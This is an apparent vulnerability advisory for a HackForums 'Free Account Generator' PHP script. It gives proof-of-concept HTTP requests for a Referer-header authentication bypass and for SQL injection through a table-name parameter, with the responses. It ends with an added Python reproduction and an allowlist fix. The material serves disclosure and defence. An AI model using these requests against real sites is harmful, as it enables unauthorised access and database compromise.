HackForums FAG 2.0 - Multiple Vulnerabilities

2016.08.23
bRpsd (AE)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

==============================================================================================
[-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities
[-] Author => bRpsd (skype: vegnox)
[-] Date Release => 22 August, 2016
[-] Vendor => HackForums, froy0z
Title => Free Account Generator 2.0
Thread Post => http://hackforums.net/showthread.php?tid=4882268
Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA
Vulnerable Version => 2.0
Tested Version => Latest, 2.0 on a Wamp Server
==============================================================================================

Vulnerability #1 : Using the generator without registering or purchasing a membership.

Vuln File: /lib/generate.php
Vuln Code: Line 3-6

/*********************************************************************************
3. $pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST'));
4. if($pos===false){
5.     die('No Access');
6. }
*********************************************************************************/

The only access control before an account is generated is strpos(): it checks that the value of HTTP_HOST appears somewhere in HTTP_REFERER. Referer is a client-supplied header, so anyone can pass the check by sending a Referer that contains the host name. No session, login or membership is verified at all.

[-] Proof Of Concept [-]

http://localhost/lib/generate.php?generator=1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-None-Match: 1
Upgrade-Insecure-Requests: 1

Response: No Access

[bypass]

http://localhost/lib/generate.php?generator=1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1
Connection: keep-alive
If-None-Match: 1
Upgrade-Insecure-Requests: 1

Response: test@account.com:123123

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vulnerability #2 : SQL Injection

Vuln File: /lib/generate.php
Vuln Code: Line 10 & 34-40

/******************************************************************************************************************************************************************
10. $generator = mysqli_real_escape_string($con, $_GET['generator']);

34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con));
35. if(mysqli_num_rows($result) < 1){
36.     exit("0 Accounts in stock");
37. }
38. while($row = mysqli_fetch_array($result)){
39.     echo $row['alt'];
40. }
******************************************************************************************************************************************************************/

The 'generator' GET parameter is concatenated into the table name of the query on line 34. mysqli_real_escape_string() is applied on line 10, but it only escapes quotes, backslashes and a few control characters; it does not touch backticks or spaces, and it offers no protection for a value used as an identifier. An attacker can therefore close the backtick-quoted table name and append arbitrary SQL, and because the script prints mysqli_error() on failure, the DBMS error messages (including the database name, as seen below) are echoed back to the client.

[-] Proof Of Concept [-]

http://localhost/lib/generate.php?generator=1+3
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1+3
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: 1

Response: Table 'FAG_2sql1.generator1 3' doesn't exist

http://localhost/lib/generate.php?generator=1`+TEST
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1`+TEST
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: 1

Response: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1
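The table-name injection from Vulnerability #2, as an added example that is not part of the advisory or of the FAG 2.0 code: Python with sqlite3 standing in for MySQL, a php_escape() that mimics the character set mysqli_real_escape_string() escapes, the query built the same way as line 34 of generate.php, and a hardened version that validates the generator id against an allowlist before it becomes a table suffix. The table contents, the allowlist and the function names are assumptions made for the example.

```python
"""
Added example (not from the advisory or the FAG 2.0 code base): reproduces
the identifier injection in /lib/generate.php with sqlite3 standing in for
MySQL, then shows an allowlist fix. mysqli_real_escape_string() is modelled
by php_escape(); the sample table and the allowlist are constructed here.
"""
import sqlite3


def php_escape(s: str) -> str:
    """Escapes the same characters mysqli_real_escape_string() escapes:
    NUL, \\n, \\r, backslash, single quote, double quote and Ctrl-Z.
    A backtick is NOT in this list, so escaping cannot protect a value that
    is interpolated inside a backtick-quoted identifier."""
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one generator table, one account in stock."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE generator1 (alt TEXT, status TEXT)")
    con.executemany("INSERT INTO generator1 VALUES (?, ?)",
                    [("test@account.com:123123", "1"),
                     ("used@account.com:x", "0")])
    con.commit()
    return con


def vulnerable_generate(con: sqlite3.Connection, generator: str) -> str:
    """Mirrors lines 10 and 34-40 of generate.php: escape, then interpolate
    the value into the table name. RAND() is spelled RANDOM() in SQLite."""
    generator = php_escape(generator)
    sql = (f"SELECT * FROM `generator{generator}` WHERE `status` != '0' "
           "ORDER BY RANDOM() LIMIT 1")
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        return f"error: {e}"      # generate.php echoes mysqli_error() here
    return rows[0][0] if rows else "0 Accounts in stock"


# Assumed: the set of generator tables the application actually ships.
ALLOWED_GENERATORS = {1}


def safe_generate(con: sqlite3.Connection, generator: str) -> str:
    """Hardened form: the request may only pick a table from an allowlist of
    known ids, so nothing client-controlled reaches the SQL text unchecked.
    The status comparison is a bound parameter for good measure."""
    if not generator.isdigit() or int(generator) not in ALLOWED_GENERATORS:
        return "No such generator"
    sql = (f"SELECT alt FROM generator{int(generator)} WHERE status != ? "
           "ORDER BY RANDOM() LIMIT 1")
    rows = con.execute(sql, ("0",)).fetchall()
    return rows[0][0] if rows else "0 Accounts in stock"


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_generate(db, "1"))        # the account in stock
    print(vulnerable_generate(db, "1 3"))      # no such table: generator1 3
    print(vulnerable_generate(db, "1` TEST"))  # syntax error: injection confirmed
    print(safe_generate(db, "1` TEST"))        # No such generator
    print(safe_generate(db, "1"))              # the account in stock
```

Run as a script, the "1 3" payload reproduces the "doesn't exist" response from the first PoC request and "1` TEST" the syntax error from the second, both passing through php_escape() untouched; the hardened function rejects both before any SQL is built. The point to take away is that no escaping function and no bound parameter can make the original query shape safe, because the untrusted value is an identifier, not a string literal: the only fix is to stop the request from choosing the table name except through an allowlist (an integer cast alone stops the injection but still lets a caller probe which tables exist).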

References:

http://hackforums.net/showthread.php?tid=4882268

